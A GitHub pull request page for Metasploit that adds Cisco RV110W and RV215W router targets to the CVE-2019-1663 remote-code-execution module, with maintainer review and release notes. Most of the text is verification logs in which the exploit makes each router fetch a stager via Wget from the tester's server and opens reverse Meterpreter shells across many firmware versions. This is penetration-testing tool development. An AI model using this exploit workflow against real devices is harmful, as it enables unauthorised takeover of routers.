Skip to content

CVE-2019-1663 - Add support for RV110W and RV215W models. #12133

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 8 commits into from
Aug 30, 2019
Merged

CVE-2019-1663 - Add support for RV110W and RV215W models. #12133

merged 8 commits into from
Aug 30, 2019

Conversation

@qkaiser
Copy link
Contributor

@qkaiser qkaiser commented Jul 27, 2019
edited by wvu
Loading

This pull request add support for Cisco RV110W and RV215W models that are affected by the same issue than RV130 (CVE-2019-1663).

I wrote a check function that fingerprint firmware versions based on a file that is available to unauthenticated users. This is the best method I could find given the httpd server does not leak information through headers. If you can think of a better method let me know :)

I used the existing method of deprecation given that #12027 hasn't landed yet. I'll let @wvu-r7 refactor the module with proper deprecation method when it lands.

One open question is whether it is possible to set a default payload based on the chosen target ? So that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Verification

Cisco RV110W (firmware version 1.1.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.1.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 0
target => 0
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/Oeg2hQAjOd
[*] Client 192.168.1.1 (Wget) requested /Oeg2hQAjOd
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:40785) at 2019-07-18 21:25:56 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 1381 created.
Channel 1 created.
nvram get fw_version
1.1.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 1
target => 1
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/E8DN5bSj5D
[*] Client 192.168.1.1 (Wget) requested /E8DN5bSj5D
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:47864) at 2019-07-18 21:11:05 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 472 created.
Channel 1 created.
nvram get fw_version
1.2.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.10)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.0.10
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 2
target => 2
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/4VFaoatLb
[*] Client 192.168.1.1 (Wget) requested /4VFaoatLb
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 9 opened (192.168.1.100:4444 -> 192.168.1.1:35866) at 2019-07-18 20:58:33 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 544 created.
Channel 1 created.
nvram get fw_version
1.2.0.10
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 9 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.4)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 3
target => 3
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/2nlTdxRvlLf
[*] Client 192.168.1.1 (Wget) requested /2nlTdxRvlLf
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 6 opened (192.168.1.100:4444 -> 192.168.1.1:49181) at 2019-07-18 19:26:06 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 520 created.
Channel 1 created.
nvram get fw_version
1.2.1.4
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 6 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 4
target => 4
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/9f1U7su
[*] Client 192.168.1.1 (Wget) requested /9f1U7su
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 4 opened (192.168.1.100:4444 -> 192.168.1.1:60217) at 2019-07-18 19:16:04 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 694 created.
Channel 1 created.
nvram get fw_version
1.2.1.7
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 4 closed.  Reason: User exit

Cisco RV215W (firmware version 1.1.0.5)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.1.0.5
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 6
target => 6
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/g4KoWbXVnJ
[*] Local IP: http://192.168.1.100:8080/g4KoWbXVnJ
[*] Client 192.168.1.1 (Wget) requested /g4KoWbXVnJ
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 16 opened (192.168.1.100:4444 -> 192.168.1.1:37543) at
2019-07-26 15:48:47 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 782 created.
Channel 1 created.
nvram get fw_version
1.1.0.5
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 16 closed.  Reason: User exit

Cisco RV215W (firmware version 1.1.0.6)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.1.0.6
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 7
target => 7
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/ubI9mgBj
[*] Local IP: http://192.168.1.100:8080/ubI9mgBj
[*] Client 192.168.1.1 (Wget) requested /ubI9mgBj
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:34516) at
2019-07-26 15:42:11 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 754 created.
Channel 1 created.
nvram get fw_version
1.1.0.6
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV215W (firmware version 1.2.0.14)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.2.0.14 or 1.2.0.15
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 8
target => 8
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/Fv3IrUrcS5Xb37
[*] Local IP: http://192.168.1.100:8080/Fv3IrUrcS5Xb37
[*] Client 192.168.1.1 (Wget) requested /Fv3IrUrcS5Xb37
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:56255) at
2019-07-26 15:35:54 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 730 created.
Channel 1 created.
nvram get fw_version
1.2.0.14
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV215W (firmware version 1.2.0.15)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.2.0.14 or 1.2.0.15
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 9
target => 9
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/5JDmdNNlZSjCO
[*] Local IP: http://192.168.1.100:8080/5JDmdNNlZSjCO
[*] Client 192.168.1.1 (Wget) requested /5JDmdNNlZSjCO
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 10 opened (192.168.1.100:4444 -> 192.168.1.1:49636) at
2019-07-26 15:29:18 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 807 created.
Channel 1 created.
nvram get fw_version
1.2.0.15
exit
exmeterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 10 closed.  Reason: User exit

Cisco RV215W (firmware version 1.3.0.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1
(not vulnerable), 1.3.1.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/Ulsp7WNdRpwoJA
[*] Local IP: http://192.168.1.100:8080/Ulsp7WNdRpwoJA
[*] Client 192.168.1.1 (Wget) requested /Ulsp7WNdRpwoJA
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 5 opened (192.168.1.100:4444 -> 192.168.1.1:56965) at
2019-07-26 15:15:14 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 792 created.
Channel 1 created.
nvram get fw_version
1.3.0.7
exit
emeterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 5 closed.  Reason: User exit

Cisco RV215W (firmware version 1.3.0.8)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1
(not vulnerable), 1.3.1.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/hdtlzE
[*] Local IP: http://192.168.1.100:8080/hdtlzE
[*] Client 192.168.1.1 (Wget) requested /hdtlzE
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.1:34656) at
2019-07-26 14:58:59 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 770 created.
Channel 1 created.
nvraw get fw_version
/bin/sh: nvraw: not found
nvram get fw_version
1.3.0.8
exit
emeterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 5 closed.  Reason: User exit

Updates #11613.

@bcoles bcoles added the module label Jul 27, 2019
@wvu wvu self-assigned this Jul 28, 2019
@wvu
Copy link
Contributor

wvu commented Aug 1, 2019

Hi, @qkaiser. I probably won't be able to get the new devices to test, so I'm relying on you for that. :)

One open question is whether it is possible to set a default payload based on the chosen target ? So that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Yep! You can set DefaultOptions as per #10471.

wvu
wvu reviewed Aug 1, 2019
View reviewed changes
wvu
wvu reviewed Aug 1, 2019
View reviewed changes
@qkaiser
Copy link
Contributor Author

qkaiser commented Aug 2, 2019

Hi, @qkaiser. I probably won't be able to get the new devices to test, so I'm relying on you for that. :)

Thanks for trusting me with this.

One open question is whether it is possible to set a default payload based on the chosen target ? So that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Yep! You can set DefaultOptions as per #10471.

Great ! I just did that in the latest commit.

@wvu wvu mentioned this pull request Aug 22, 2019
Merged
14 tasks
@wvu
Copy link
Contributor

wvu commented Aug 22, 2019

I'll get this updated with #12223 once that lands, then I'll land this.

@wvu
Copy link
Contributor

wvu commented Aug 30, 2019

@qkaiser: Hey, #12223 landed, and I've refactored deprecation here. Just waiting on tests to pass, and then I'll land this!

wvu added a commit that referenced this pull request Aug 30, 2019
@wvu
Land #12133, CVE-2019-1663 RV{110,215}W targets
a66fa7d
@wvu wvu merged commit b0b7289 into rapid7:master Aug 30, 2019
@wvu
Copy link
Contributor

wvu commented Aug 30, 2019
edited by tdoan-r7
Loading

Release Notes

The exploit/linux/http/cisco_rv130_rmi_rce module has been moved to exploit/linux/http/cve_2019_1663_cisco_rmi_rce. Targets have also been added for RV110W and RV215W.

jmartin-tech pushed a commit that referenced this pull request Aug 30, 2019
@wvu @jmartin-tech
Land #12133, CVE-2019-1663 RV{110,215}W targets
55b6aba
@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Sep 5, 2019
This was referenced Aug 20, 2021
Merged
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

1 more reviewer

@wvu wvu wvu left review comments

Reviewers whose approvals may not affect merge requirements

Assignees

@wvu wvu

Labels

module rn-enhancement release notes enhancement

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@qkaiser @wvu @bcoles @tdoan-r7